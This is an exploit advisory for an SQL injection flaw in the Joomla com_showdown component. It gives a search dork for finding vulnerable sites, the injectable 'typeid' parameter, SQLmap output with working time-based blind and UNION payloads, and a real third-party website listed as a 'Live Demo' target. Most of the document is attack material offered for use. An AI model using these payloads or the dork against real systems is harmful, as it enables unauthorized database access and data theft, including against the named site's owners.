######################
# Exploit Title : Joomla com_showdown SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_showdown
# version : 1.5.0
# Tested on: [ Windows 7 ]
# skype:xbadgirl21
# Date: 2016/07/24
# video Proof : https://youtu.be/IglNYsDcV3g
######################
# [+] DESCRIPTION :
######################
# [+] an SQL injection been Detected in this Joomla components showdown
 after you add ['] or ["] to
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that
corresponds to your MySQL or
# [+] You Will Notice a change in the Frontpage of the target .
######################
# [+] Poc :
######################
# [typeid] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]
######################
# [+] SQLmap PoC:
######################
# GET parameter 'typeid' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
#
# Parameter: typeid (GET)
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind
#    Payload: option=com_showdown&typeid=11 AND SLEEP(5)
#
#    Type: UNION query
#    Title: Generic UNION query (NULL) - 6 columns
#    Payload: option=com_showdown&typeid=11 UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870
# 43554447614a527451564c,0x71706a7171),NULL-- LZga
# ---
# [12:59:46] [INFO] the back-end DBMS is MySQL
# web server operating system: Linux Debian 6.0 (squeeze)
# web application technology: PHP 5.2.6, Apache 2.2.16
# back-end DBMS: MySQL >= 5.0.12
# [12:59:46] [INFO] fetching database names
# available databases [3]:
######################
# [+] Live Demo :
######################
# http://www.circuse.eu/index.php?option=com_showdown&typeid=11
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################